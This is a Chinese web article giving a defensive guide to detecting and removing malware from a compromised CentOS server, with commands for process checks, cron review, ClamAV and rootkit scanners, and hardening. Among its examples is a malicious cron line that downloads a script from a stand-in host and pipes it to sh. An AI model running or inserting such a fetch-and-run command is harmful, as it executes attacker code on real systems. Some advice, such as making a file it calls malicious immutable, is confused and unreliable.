如何清理centos的恶意软件
导读:一、前期准备:隔离与备份 1. 断开网络连接 立即断开受感染CentOS服务器的网络(物理断开或禁用网卡),防止恶意软件进一步扩散或窃取数据。 2. 备份重要数据 通过安全介质(如离线U盘)备份关键业务数据(如数据库、配置文件),备份前需确...
一、前期准备:隔离与备份
1. 断开网络连接
立即断开受感染CentOS服务器的网络(物理断开或禁用网卡),防止恶意软件进一步扩散或窃取数据。
2. 备份重要数据
通过安全介质(如离线U盘)备份关键业务数据(如数据库、配置文件),备份前需确认数据未被恶意软件加密或篡改。
二、检测恶意软件
1. 使用系统内置工具识别可疑进程与服务
- 查看异常进程:运行
top -c
(显示完整命令)或ps -ef
(查看进程树),重点关注高CPU/内存占用、名称陌生(如kinsing
、xmr64
、sysupdate
)、无签名(Command列无明确程序路径)的进程。 - 确认进程合法性:通过
ls -l /proc/$PID/exe
($PID为可疑进程ID)查看进程对应的可执行文件路径。若路径位于非标准目录(如/tmp
、/dev/shm
)或文件属性异常(如无所有者、权限为-rwsr-xr-x
),则可能为恶意进程。 - 检查恶意服务:运行
systemctl list-unit-files --state=enabled
(CentOS 7+)或chkconfig --list
(CentOS 6及以下),查看是否有未授权的自动启动服务;检查/etc/rc.local
、/etc/init.d/
目录,确认是否有新增的可疑脚本。
2. 检查定时任务(持久化手段)
- 查看当前用户计划任务:运行
crontab -l
,检查是否有异常命令(如频繁下载脚本、调用挖矿程序)。 - 查看系统级计划任务:检查
/etc/crontab
、/etc/cron.d/
、/etc/cron.hourly/
、/etc/cron.daily/
等目录,确认是否有非业务需求的定时任务(如*/5 * * * * wget -qO- http://malicious-site.com/script.sh | sh
)。
3. 使用第三方工具深度扫描
- ClamAV(开源杀毒软件):
安装:sudo yum install epel-release & & sudo yum install clamav clamav-update -y
;
更新病毒库:sudo systemctl stop clamav-freshclam & & sudo freshclam & & sudo systemctl start clamav-freshclam
;
扫描系统:sudo clamscan -r -i /
(递归扫描根目录,仅显示感染文件);
清除恶意文件:sudo clamscan -r --remove /
(扫描并直接删除感染文件,建议先备份)。 - Rootkit检测工具:
安装chkrootkit
:sudo yum install chkrootkit -y
,运行sudo chkrootkit
扫描系统是否存在rootkit(如lrk
、chkutmp
);
安装rkhunter
:sudo yum install rkhunter -y
,运行sudo rkhunter --check
检查系统文件完整性,重点关注/bin
、/sbin
、/usr/bin
等目录。
三、清除恶意软件
1. 终止恶意进程
- 运行
kill -9 $PID
($PID为可疑进程ID)强制终止进程; - 若进程无法终止(如权限不足),可使用
sudo kill -9 $PID
; - 对于顽固进程(如自我复制的随机名木马),需先清除其持久化机制(如计划任务、服务),再尝试终止。
2. 删除恶意文件
- 根据进程路径或扫描结果,使用
rm -rf /path/to/malicious/file
删除恶意文件(如/lib/libudev.so
、/tmp/gcc.sh
); - 对于系统关键目录(如
/etc
、/usr/bin
)的文件,删除前需确认备份(如cp /etc/passwd /etc/passwd.bak
)。
3. 清除持久化机制
- 停止并禁用恶意服务:
sudo systemctl stop malicious-service & & sudo systemctl disable malicious-service
(CentOS 7+);或sudo chkconfig malicious-service off
(CentOS 6及以下)。 - 删除可疑计划任务:编辑
crontab -e
删除异常任务,或运行sudo rm -f /etc/cron.hourly/malicious-script
删除系统级计划任务。 - 保护关键目录:对
/etc
、/usr/bin
、/lib
等易被篡改的目录添加不可修改属性,防止恶意软件重新植入:sudo chattr +i /etc/passwd /etc/shadow /etc/group /lib/libudev.so
(解除保护时用sudo chattr -i
)。
4. 修复系统漏洞
- 更新系统与软件:运行
sudo yum update -y
安装最新安全补丁,修复已知漏洞(如OpenSSL、Glibc漏洞); - 强化服务配置:限制应用程序运行权限(如Web服务用
apache
用户而非root
),设置目录权限(如chmod 750 /var/www/html
),避免恶意软件通过漏洞提权。
四、后续防护:防止再次感染
- 启用防火墙:配置
iptables
或firewalld
限制不必要的网络访问(如关闭SSH默认端口22,仅允许可信IP连接):
sudo firewall-cmd --permanent --add-rich-rule='rule family="ipv4" source address="192.168.1.100" port port="22" protocol="tcp" accept'
;
sudo firewall-cmd --reload
。 - 使用Fail2Ban:安装
fail2ban
(sudo yum install fail2ban -y
)并配置/etc/fail2ban/jail.local
,封禁多次登录失败的IP地址(如SSH暴力破解)。 - 定期扫描与审计:每周运行ClamAV扫描系统,每月检查计划任务、服务、日志(
/var/log/messages
、/var/log/secure
),及时发现异常。 - 强化密码策略:设置复杂密码(包含大小写字母、数字、特殊字符,长度≥8位),定期更换密码(每90天);禁用默认账户(如
root
远程登录),使用密钥认证替代密码认证。
声明:本文内容由网友自发贡献,本站不承担相应法律责任。对本内容有异议或投诉,请联系2913721942#qq.com核实处理,我们将尽快回复您,谢谢合作!
若转载请注明出处: 如何清理centos的恶意软件
本文地址: https://pptw.com/jishu/727319.html